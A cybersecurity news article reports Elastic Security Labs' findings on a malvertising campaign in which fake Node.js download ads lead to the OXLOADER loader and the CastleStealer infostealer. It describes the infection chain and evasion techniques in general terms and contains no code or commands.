Cybersecurity experts have revealed a new wave of cyberattacks involving a malware loader known as OXLOADER. This tool is employed to distribute CastleStealer, a type of information-stealing malware. The campaign, uncovered by Elastic Security Labs, features the use of deceptive Google Ads to initiate the malware distribution process.
Malicious Ads Fuel Cyber Threat
The campaign, identified as REF8372, employs malicious advertisements to lure victims. Researchers suggest the individuals behind the attack may be Russian-speaking and financially driven, as they avoid targeting systems in the Commonwealth of Independent States (CIS). The campaign’s sophisticated techniques include control-flow flattening and mixed Boolean-Arithmetic to obscure the malware’s presence.
Users searching for terms like “lts version of node.js” may inadvertently access a counterfeit site through fraudulent ads. The ads, falsely attributed to a Ukrainian entity, “ВОЛОДИМИР ТЕРЕЩЕНКО,” were removed by Google on May 14, 2026. Whether this advertiser account is directly linked to the attackers or a front remains unclear.
Unveiling the Attack Methodology
The attack initiates when users interact with the fraudulent site, leading to the download of a batch script hosted on Storj, a decentralized storage service. This method illustrates the ongoing exploitation of legitimate platforms to bypass security filters. The script launches a fake installation wizard while covertly downloading and executing OXLOADER via a PowerShell command, triggering a User Account Control (UAC) prompt.
Further complicating detection, the attack uses DLL side-loading to deploy a rogue DLL, which decrypts and runs the CastleStealer payload. Techniques such as control-flow flattening and mixed Boolean-Arithmetic are employed to avoid detection, while anti-VM measures ensure the malware does not run in sandbox environments.
Implications and Future Monitoring
CastleStealer, a .NET-based information stealer, is part of a broader campaign known as BackgroundFix, previously linked with CastleLoader. The activity is associated with a threat group identified as GrayBravo. Despite being in its early stages, OXLOADER’s sophisticated design indicates potential for significant impact.
Elastic Security Labs emphasizes that the malware’s engineering reflects deliberate efforts to evade detection and analysis. This has resulted in low detection rates across various security engines, allowing OXLOADER to operate under the radar. The cybersecurity community is advised to keep a close watch on this evolving threat.
